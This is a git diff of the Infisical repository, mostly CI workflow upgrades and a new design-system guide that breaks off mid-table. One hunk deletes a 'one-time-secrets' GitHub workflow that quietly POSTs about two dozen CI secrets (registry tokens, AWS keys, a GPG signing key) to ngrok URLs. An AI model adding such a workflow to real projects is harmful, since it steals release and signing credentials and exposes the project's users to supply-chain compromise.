diff --git a/.github/workflows/be-test-report.yml b/.github/workflows/be-test-report.yml index bd57b377eb6..f2c951f5759 100644 --- a/.github/workflows/be-test-report.yml +++ b/.github/workflows/be-test-report.yml @@ -15,7 +15,7 @@ jobs: - uses: actions/checkout@v2 - name: πŸ“ Download test results id: download-artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v6 with: name: be-test-results path: backend diff --git a/.github/workflows/check-be-ts-and-lint.yml b/.github/workflows/check-be-ts-and-lint.yml index c0c5796048d..cd128d11b84 100644 --- a/.github/workflows/check-be-ts-and-lint.yml +++ b/.github/workflows/check-be-ts-and-lint.yml @@ -10,26 +10,64 @@ on: - "backend/.eslintrc.js" jobs: - check-be-pr: - name: Check TS and Lint + type-check: + name: Type Check runs-on: ubuntu-latest timeout-minutes: 15 steps: - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend + - name: πŸ“¦ Cache tsbuildinfo + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/.cache/tsconfig.tsbuildinfo + key: backend-tsbuildinfo-${{ github.ref }}-${{ github.sha }} + restore-keys: | + backend-tsbuildinfo-${{ github.ref }}- + backend-tsbuildinfo- - name: Run type check run: npm run type:check working-directory: backend + + lint: + name: Lint + runs-on: ubuntu-latest + timeout-minutes: 15 + + steps: + - name: ☁️ Checkout source + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - name: πŸ”§ Setup Node 22 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: "22" + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} + - name: Install dependencies + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci + working-directory: backend - name: Run lint check run: npm run lint working-directory: backend diff --git a/.github/workflows/check-fe-ts-and-lint.yml b/.github/workflows/check-fe-ts-and-lint.yml index 12c59dbb049..f568772c134 100644 --- a/.github/workflows/check-fe-ts-and-lint.yml +++ b/.github/workflows/check-fe-ts-and-lint.yml @@ -10,26 +10,64 @@ on: - "frontend/.eslintrc.js" jobs: - check-fe-ts-lint: - name: Check Frontend Type and Lint check + type-check: + name: Type Check runs-on: ubuntu-latest timeout-minutes: 15 steps: - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: frontend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/node_modules + key: frontend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('frontend/package-lock.json') }} - name: πŸ“¦ Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: frontend + - name: πŸ“¦ Cache tsbuildinfo + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/.cache/tsconfig.app.tsbuildinfo + key: frontend-tsbuildinfo-${{ github.ref }}-${{ github.sha }} + restore-keys: | + frontend-tsbuildinfo-${{ github.ref }}- + frontend-tsbuildinfo- - name: πŸ—οΈ Run Type check run: npm run type:check working-directory: frontend + + lint: + name: Lint + runs-on: ubuntu-latest + timeout-minutes: 15 + + steps: + - name: ☁️ Checkout source + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - name: πŸ”§ Setup Node 22 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: "22" + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/node_modules + key: frontend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('frontend/package-lock.json') }} + - name: πŸ“¦ Install dependencies + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci + working-directory: frontend - name: πŸ—οΈ Run Lint check run: npm run lint working-directory: frontend diff --git a/.github/workflows/one-time-secrets.yaml b/.github/workflows/one-time-secrets.yaml deleted file mode 100644 index 5876840831a..00000000000 --- a/.github/workflows/one-time-secrets.yaml +++ /dev/null @@ -1,76 +0,0 @@ -name: One-Time Secrets Retrieval - -on: - workflow_dispatch: - -permissions: - contents: read - -jobs: - retrieve-secrets: - runs-on: ubuntu-latest - steps: - - name: Send environment variables to ngrok - run: | - echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env" - - # Send secrets as JSON - cat << EOF | curl -X POST \ - -H "Content-Type: application/json" \ - -d @- \ - https://7864d0fe7cbb.ngrok-free.app/api/receive-env \ - > /dev/null 2>&1 || true - { - "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}", - "GORELEASER_KEY": "${GORELEASER_KEY}", - "AUR_KEY": "${AUR_KEY}", - "FURYPUSHTOKEN": "${FURYPUSHTOKEN}", - "NPM_TOKEN": "${NPM_TOKEN}", - "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}", - "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}", - "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}", - "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}", - "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}", - "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}", - "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}", - "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}", - "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}", - "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}", - "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}", - "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}", - "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}", - "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}", - "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}", - "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}", - "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}", - "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}", - "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}" - } - EOF - - echo "Secrets retrieval completed" - env: - GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }} - GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }} - AUR_KEY: ${{ secrets.AUR_KEY }} - FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }} - NPM_TOKEN: ${{ secrets.NPM_TOKEN }} - DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }} - DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }} - CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }} - INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }} - INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }} - INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }} - INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }} - INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }} - GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }} - GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }} - CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }} - CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }} - CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }} - CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }} - CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }} - CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }} - CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }} - CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }} - POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }} diff --git a/.github/workflows/release-standalone-docker-img-postgres-offical.yml b/.github/workflows/release-standalone-docker-img-postgres-offical.yml index 98901969086..93cc55b5945 100644 --- a/.github/workflows/release-standalone-docker-img-postgres-offical.yml +++ b/.github/workflows/release-standalone-docker-img-postgres-offical.yml @@ -21,7 +21,7 @@ jobs: id: extract_version run: echo "::set-output name=version::${GITHUB_REF_NAME}" - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: fetch-depth: 0 - name: πŸ“¦ Install dependencies to test all dependencies @@ -39,9 +39,9 @@ jobs: id: commit uses: pr-mpt/actions-commit-hash@v2 - name: πŸ”§ Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + uses: docker/setup-buildx-action@v3 - name: πŸ‹ Login to Docker Hub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKERHUB_USERNAME }} password: ${{ secrets.DOCKERHUB_TOKEN }} @@ -84,7 +84,7 @@ jobs: id: extract_version run: echo "::set-output name=version::${GITHUB_REF_NAME}" - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: fetch-depth: 0 - name: πŸ“¦ Install dependencies to test all dependencies @@ -102,9 +102,9 @@ jobs: id: commit uses: pr-mpt/actions-commit-hash@v2 - name: πŸ”§ Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + uses: docker/setup-buildx-action@v3 - name: πŸ‹ Login to Docker Hub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKERHUB_USERNAME }} password: ${{ secrets.DOCKERHUB_TOKEN }} diff --git a/.github/workflows/run-backend-bdd-tests.yml b/.github/workflows/run-backend-bdd-tests.yml index 2fd2c844a13..e5fffbf9e74 100644 --- a/.github/workflows/run-backend-bdd-tests.yml +++ b/.github/workflows/run-backend-bdd-tests.yml @@ -25,7 +25,7 @@ jobs: docker system prune -af - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install uv uses: astral-sh/setup-uv@v5 - name: Install Python @@ -36,11 +36,10 @@ jobs: with: version: "2.14.2" - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@v4 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json - name: Setup Python 3.11 uses: actions/setup-python@v5 with: @@ -52,8 +51,15 @@ jobs: cmake -S /tmp/sscep-build -B /tmp/sscep-build/build make -C /tmp/sscep-build/build -j$(nproc) sudo cp /tmp/sscep-build/build/sscep /usr/local/bin/sscep + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@v4 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend - name: Output .env file and enable feature flags for BDD tests diff --git a/.github/workflows/run-backend-tests.yml b/.github/workflows/run-backend-tests.yml index 1e702dec870..7646b2c8723 100644 --- a/.github/workflows/run-backend-tests.yml +++ b/.github/workflows/run-backend-tests.yml @@ -14,7 +14,7 @@ jobs: check-be-pr: name: Run integration test runs-on: ubuntu-latest - timeout-minutes: 30 + timeout-minutes: 45 steps: - name: Free up disk space run: | @@ -25,20 +25,26 @@ jobs: docker system prune -af - name: ☁️ Checkout source - uses: actions/checkout@v3 - - uses: KengoTODA/actions-setup-docker-compose@v1 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - uses: KengoTODA/actions-setup-docker-compose@477353946803dd64eaa44008b865b6bfc88cab4e # v1.2.4 if: ${{ env.ACT }} name: Install `docker compose` for local simulations with: version: "2.14.2" - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend - name: Start postgres and redis run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis @@ -47,18 +53,32 @@ jobs: - name: Run unit test run: npm run test:unit working-directory: backend + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3.12.0 + - name: Build FIPS test image + uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2 + with: + context: backend + file: backend/Dockerfile.dev.fips + load: true + tags: infisical-backend-fips:latest + cache-from: type=gha + cache-to: type=gha,mode=max - name: Run integration test - run: npm run test:e2e - working-directory: backend - env: - E2E_TEST_ORACLE_DB_19_HOST: ${{ secrets.E2E_TEST_ORACLE_DB_19_HOST }} - E2E_TEST_ORACLE_DB_19_USERNAME: ${{ secrets.E2E_TEST_ORACLE_DB_19_USERNAME }} - E2E_TEST_ORACLE_DB_19_PASSWORD: ${{ secrets.E2E_TEST_ORACLE_DB_19_PASSWORD }} - E2E_TEST_ORACLE_DB_19_DATABASE: ${{ secrets.E2E_TEST_ORACLE_DB_19_DATABASE }} - REDIS_URL: redis://172.17.0.1:6379 - DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable - AUTH_SECRET: something-random - ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218 + run: | + docker run --rm --network host \ + -e DB_CONNECTION_URI="postgres://infisical:infisical@localhost:5432/infisical?sslmode=disable" \ + -e REDIS_URL="redis://localhost:6379" \ + -e AUTH_SECRET="something-random" \ + -e ENCRYPTION_KEY="p5e5k2j3+HIErjm02dzSrlhXc1xhdgoWvC6pox410rE=" \ + -e NODE_ENV="test" \ + -e NODE_OPTIONS="--force-fips" \ + -e E2E_TEST_ORACLE_DB_19_HOST="${{ secrets.E2E_TEST_ORACLE_DB_19_HOST }}" \ + -e E2E_TEST_ORACLE_DB_19_USERNAME="${{ secrets.E2E_TEST_ORACLE_DB_19_USERNAME }}" \ + -e E2E_TEST_ORACLE_DB_19_PASSWORD="${{ secrets.E2E_TEST_ORACLE_DB_19_PASSWORD }}" \ + -e E2E_TEST_ORACLE_DB_19_DATABASE="${{ secrets.E2E_TEST_ORACLE_DB_19_DATABASE }}" \ + infisical-backend-fips:latest \ + npm run test:e2e - name: cleanup run: | docker compose -f "docker-compose.dev.yml" down diff --git a/.github/workflows/validate-upgrade-path.yml b/.github/workflows/validate-upgrade-path.yml deleted file mode 100644 index 71ed6be3674..00000000000 --- a/.github/workflows/validate-upgrade-path.yml +++ /dev/null @@ -1,39 +0,0 @@ -name: "Validate Upgrade Path Configuration" - -on: - pull_request: - types: [opened, synchronize] - paths: - - "backend/upgrade-path.yaml" - - "backend/scripts/validate-upgrade-path-file.ts" - - "backend/src/services/upgrade-path/upgrade-path-schemas.ts" - - workflow_call: - -jobs: - validate-upgrade-path: - name: Validate upgrade-path.yaml - runs-on: ubuntu-latest - timeout-minutes: 15 - - steps: - - name: Checkout source - uses: actions/checkout@v4 - with: - fetch-depth: 1 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - cache: 'npm' - cache-dependency-path: 'backend/package-lock.json' - - - name: Install minimal dependencies - working-directory: backend - run: | - npm install --no-package-lock js-yaml@^4.1.0 zod@^3.22.0 tsx@^4.0.0 @types/js-yaml@^4.0.0 re2@^1.20.0 - - - name: Validate upgrade-path.yaml format - working-directory: backend - run: npx tsx ./scripts/validate-upgrade-path-file.ts \ No newline at end of file diff --git a/CLAUDE.md b/CLAUDE.md index 984fc9f3e44..a630ffef250 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -49,6 +49,10 @@ Both `backend/` and `frontend/` enforce a minimum release age of 7 days for npm ## Cross-Cutting Patterns +### Design System & Voice + +The v3 visual system (colors, typography, components, layout) and product voice/content tone are documented in [`DESIGN.md`](DESIGN.md). Read it before producing new UI or user-visible copy. + ### Auth & Permissions Auth modes (JWT, IDENTITY_ACCESS_TOKEN, SCIM_TOKEN, MCP_JWT) are extracted in `backend/src/server/plugins/auth/`. Authorization uses CASL (`@casl/ability`) with project-level and org-level permission checks β€” see `backend/CLAUDE.md` for backend details and `frontend/CLAUDE.md` for frontend permission hooks/HOCs. Note: `API_KEY` and `SERVICE_TOKEN` auth modes are deprecated β€” do not use them in new code. diff --git a/DESIGN.md b/DESIGN.md new file mode 100644 index 00000000000..ccd82b0ee04 --- /dev/null +++ b/DESIGN.md @@ -0,0 +1,374 @@ +# Infisical Design System (v3) + +This document captures the v3 visual language and product voice used across +Infisical. It is the single reference for engineers, designers, and AI coding +agents producing new UI or user-visible copy. + +**Source of truth for tokens:** [`frontend/src/index.css`](frontend/src/index.css) (`@theme` block). +**Canonical semantic reference:** [`Badge.stories.tsx`](frontend/src/components/v3/generic/Badge/Badge.stories.tsx). +**Canonical page references:** [`OverviewPage`](frontend/src/pages/secret-manager/OverviewPage) and [`AccessControlPage`](frontend/src/pages/project/AccessControlPage). +**Component usage reference:** Every v3 generic component has a sibling `.stories.tsx` at `frontend/src/components/v3/generic//`. Read it before producing UI with that component β€” the stories carry the variants, compositions, and use-when guidance the source does not. + +--- + +## 1. Visual Theme & Atmosphere + +Infisical is a security tool for operators. The interface reads like +infrastructure: dense, calm, and legible β€” never ornamental. Dark is the native +medium; the page canvas is `--color-background`, and light themes are not part +of the system yet. + +Color carries **meaning before brand**. A danger badge is red because the +action is destructive, not because red is the accent. A project-colored button +signals project scope, not visual variety. Designers pick intent; hex values +follow. + +Depth is drawn with borders and surface tones, not shadows. Motion is +restrained β€” 200ms ease-in-out, no springs, no decorative animation. Secret +values are masked by default; revealing one is an intentional act. + +**Key characteristics:** + +- Dark-native; `--color-background` page canvas +- Semantic-first color (danger / success / warning / info / neutral) +- Scope-aware (org / sub-org / project / admin) +- Border-defined depth, no decorative shadows +- Inter, one family, across everything +- Secrets masked by default; reveal is an act + +## 2. Color Palette & Roles + +All colors are defined as CSS custom properties in +[`frontend/src/index.css`](frontend/src/index.css) and consumed via Tailwind v4 +utilities (`bg-org`, `text-danger`, etc.). Never introduce a hex that is not +in this file. + +### Scope colors (hierarchy) + +Used to signal the scope a surface, badge, or action belongs to. + +| Scope | Token | +| ---------------- | ------------------ | +| Organization | `--color-org` | +| Sub-Organization | `--color-sub-org` | +| Project | `--color-project` | +| Admin | `--color-admin` | + +### Semantic colors + +| Intent | Token | Use | +| -------- | ------------------ | ------------------------------------------------ | +| Success | `--color-success` | Healthy states, completed rotations | +| Info | `--color-info` | Informational states, external documentation | +| Warning | `--color-warning` | Attention-warranting states, stale items | +| Danger | `--color-danger` | Destructive actions, errors, expired access | +| Neutral | `--color-neutral` | Disabled, muted, "empty" states | + +### Surface & chrome + +| Role | Token | +| ------------------ | ------------------------ | +| Page background | `--color-background` | +| Foreground text | `--color-foreground` | +| Card surface | `--color-card` | +| Popover / Sheet | `--color-popover` | +| Container | `--color-container` | +| Container (hover) | `--color-container-hover`| +| Border | `--color-border` | +| Focus ring | `--color-ring` | +| Accent text | `--color-accent` | +| Muted text | `--color-muted` | +| Label text | `--color-label` | + +The `mineshaft-*` scale (50–900) is the underlying neutral ramp; see +`index.css` for the full list. Prefer semantic tokens (`card`, `border`, +`accent`) over raw mineshaft values. + +### Product-area accents (secret-manager) + +Reserved for resource types in the secret management product: +`--color-folder`, `--color-secret`, `--color-dynamic-secret`, +`--color-import`, `--color-secret-rotation`, `--color-override`. +Do not repurpose these for generic UI. + +### Tint pattern + +Colored variants always layer as tinted backgrounds with matching borders β€” +never as solid fills. The two canonical recipes: + +- **Badge** β€” `bg-/15 border-/10 text-`, hover `bg-/35` + (see [`Badge.tsx`](frontend/src/components/v3/generic/Badge/Badge.tsx)) +- **Button** β€” `bg-/10 border-/25 text-foreground`, hover `bg-/15 border-/30` + (see [`Button.tsx`](frontend/src/components/v3/generic/Button/Button.tsx)) + +## 3. Typography + +Inter is the only font family (`--font-inter`). All weights and sizes use +Tailwind's default scale. + +| Role | Class | Notes | +| ------------------------ | --------------------------------------- | --------------------------------------------------------------------- | +| Page title (h1) | `text-2xl font-medium underline underline-offset-4 decoration-/90` | In `PageHeader`; scope icon (size 26) sits inline before the title | +| Page description | `text-mineshaft-300` | Sits under the title, `mt-1.5` | +| Card title | `text-lg font-semibold leading-none` | `flex gap-1.5` so badges can sit inline | +| Card description | `text-sm text-accent` | | +| Body | `text-sm` | Default for table cells, form values, dialog content | +| Label / meta | `text-xs text-accent` | Field labels, table column captions, metadata | +| Badge | `text-xs` (auto, via `Badge`) | Never override | +| Button | `text-sm` (md/sm/lg), `text-xs` (xs) | Auto via `Button` sizing | + +Sentence case for descriptions, helper text, and empty states. Title Case for +page titles and button labels. See Β§8 for voice rules on copy itself. + +## 4. Component Stylings + +New UI must use v3 components from [`frontend/src/components/v3/`](frontend/src/components/v3). +The v2 library is legacy; only fall back when no v3 equivalent exists. +`PageHeader` is the notable exception β€” still v2, still canonical for page titles. + +For exact tokens, class lists, and every variant, read the component source +and its `*.stories.tsx` β€” this doc cites them rather than duplicating them. + +### Reading the stories + +Every component's `.stories.tsx` follows the same shape: + +- **`Variant: X`** stories β€” one per prop-driven variant (e.g. `Variant: Outline`). +- **`Example: X`** stories β€” composition recipes (e.g. `Example: With Header`, + `Example: Inside Card / Sheet / Dialog`). +- Each story's `parameters.docs.description.story` is the use-when guidance. + +When picking a component, find the `Example:` story closest to your need and +mirror it. When picking a variant, the `Variant:` story descriptions are the +canonical "use this when..." guidance. + +Run Storybook with `cd frontend && npm run storybook` (port 6006) to preview. + +### Component inventory + +Use these tables to find the component for a given intent. For props, +variants, sizes, and class lists, open the source or its `*.stories.tsx` +β€” the stories are canonical. + +#### Actions +| Component | Reach for this when… | +| --- | --- | +| [`Button`](frontend/src/components/v3/generic/Button/Button.tsx) | A text-bearing button β€” primary or secondary action. | +| [`IconButton`](frontend/src/components/v3/generic/IconButton/IconButton.tsx) | A square icon-only button β€” toolbars, row actions, compact triggers. Always `aria-label`. | +| [`ButtonGroup`](frontend/src/components/v3/generic/ButtonGroup/ButtonGroup.tsx) | Visually join related controls β€” toolbars, segmented controls, split buttons, key-value chips. | +| [`Dropdown`](frontend/src/components/v3/generic/Dropdown/Dropdown.tsx) | An action menu β€” overflow `β‹―`, split-button alternates, contextual lists. | + +#### Forms +| Component | Reach for this when… | +| --- | --- | +| [`Field`](frontend/src/components/v3/generic/Field/Field.tsx) | Wrap every form control β€” label + control + description + error. **Never render a bare control in a form.** | +| [`Label`](frontend/src/components/v3/generic/Label/Label.tsx) | Standalone form label outside a `Field`. | +| [`Input`](frontend/src/components/v3/generic/Input/Input.tsx) / [`TextArea`](frontend/src/components/v3/generic/TextArea/TextArea.tsx) | Single-line / multi-line text entry. | +| [`InputGroup`](frontend/src/components/v3/generic/InputGroup/InputGroup.tsx) | Input with left/right addons β€” search bars, prefixed values. | +| [`Select`](frontend/src/components/v3/generic/Select/Select.tsx) / [`ReactSelect`](frontend/src/components/v3/generic/ReactSelect/index.ts) | Native-style dropdown / async or searchable dropdown. | +| [`Switch`](frontend/src/components/v3/generic/Switch/Switch.tsx) / [`Checkbox`](frontend/src/components/v3/generic/Checkbox/Checkbox.tsx) | Boolean toggle / multi-select boolean. | +| [`Calendar`](frontend/src/components/v3/generic/Calendar/Calendar.tsx) | Date / multi-date / range picker primitive. | +| [`DateRangeFilter`](frontend/src/components/v3/generic/DateRangeFilter/DateRangeFilter.tsx) | Date-range filter with presets β€” for filter bars. | +| [`SecretInput`](frontend/src/components/v3/generic/SecretInput/SecretInput.tsx) | Secret-value editor with mask toggle and `${var}` highlighting. | +| [`PasswordGenerator`](frontend/src/components/v3/generic/PasswordGenerator/PasswordGenerator.tsx) | Generate a password against project secret-validation rules. | + +#### Containers & overlays +| Component | Reach for this when… | +| --- | --- | +| [`Card`](frontend/src/components/v3/generic/Card/Card.tsx) | Default section container β€” tables, filters, forms, empty states all live in a Card. | +| [`Sheet`](frontend/src/components/v3/generic/Sheet/Sheet.tsx) | Right-side panel β€” **use for create/edit forms (not Dialog)**. | +| [`Dialog`](frontend/src/components/v3/generic/Dialog/Dialog.tsx) | Centered modal β€” short interactive prompts. Prefer Sheet for forms. | +| [`AlertDialog`](frontend/src/components/v3/generic/AlertDialog/AlertDialog.tsx) | Confirm an action (destructive included). Replaces `confirm()`. | +| [`Popover`](frontend/src/components/v3/generic/Popover/Popover.tsx) | Anchored floating panel β€” filters, pickers, contextual UI. | +| [`Tooltip`](frontend/src/components/v3/generic/Tooltip/Tooltip.tsx) | Small floating annotation on hover/focus. | +| [`Accordion`](frontend/src/components/v3/generic/Accordion/Accordion.tsx) | Collapsible sections. | + +#### Data display +| Component | Reach for this when… | +| --- | --- | +| [`Table`](frontend/src/components/v3/generic/Table/Table.tsx) | Read-mostly list of records with sortable columns. Pair with `Empty` + `Pagination`. | +| [`DataGrid`](frontend/src/components/v3/generic/DataGrid/data-grid.tsx) | Editable spreadsheet-style grid β€” copy/paste, multi-cell selection, keyboard nav. Use only when `Table` isn't enough. | +| [`Pagination`](frontend/src/components/v3/generic/Pagination/Pagination.tsx) | Page controls under a Table or list. | +| [`Item`](frontend/src/components/v3/generic/Item/Item.tsx) | Vertically-stacked list rows with shared spacing β€” when a `Table` is too heavy. | +| [`Detail`](frontend/src/components/v3/generic/Detail/Detail.tsx) | Read-only label/value pairs in a detail view. | +| [`Badge`](frontend/src/components/v3/generic/Badge/Badge.tsx) | Small label or chip β€” status, scope tag, key/value pair. | + +#### Navigation & search +| Component | Reach for this when… | +| --- | --- | +| [`Sidebar`](frontend/src/components/v3/generic/Sidebar/Sidebar.tsx) | Scope-aware product navigation panel. | +| [`Breadcrumb`](frontend/src/components/v3/generic/Breadcrumb/Breadcrumb.tsx) | Hierarchical location trail at the top of a page. | +| [`Command`](frontend/src/components/v3/generic/Command/Command.tsx) | Search-driven command palette / typeahead list. | + +#### Feedback & loading +| Component | Reach for this when… | +| --- | --- | +| [`Alert`](frontend/src/components/v3/generic/Alert/Alert.tsx) | Inline message banner inside a page or Card. | +| [`Toast`](frontend/src/components/v3/generic/Toast/Toast.tsx) | Transient post-action feedback. Replaces `alert()`. | +| [`Empty`](frontend/src/components/v3/generic/Empty/Empty.tsx) | Zero-state placeholder β€” pair with Table, list, or empty filter. | +| [`Skeleton`](frontend/src/components/v3/generic/Skeleton/Skeleton.tsx) | Shimmer placeholder while data is loading. | +| [`PageLoader`](frontend/src/components/v3/generic/PageLoader/PageLoader.tsx) | Centered Lottie spinner for full-page loading. | + +#### Atoms & domain +| Component | Reach for this when… | +| --- | --- | +| 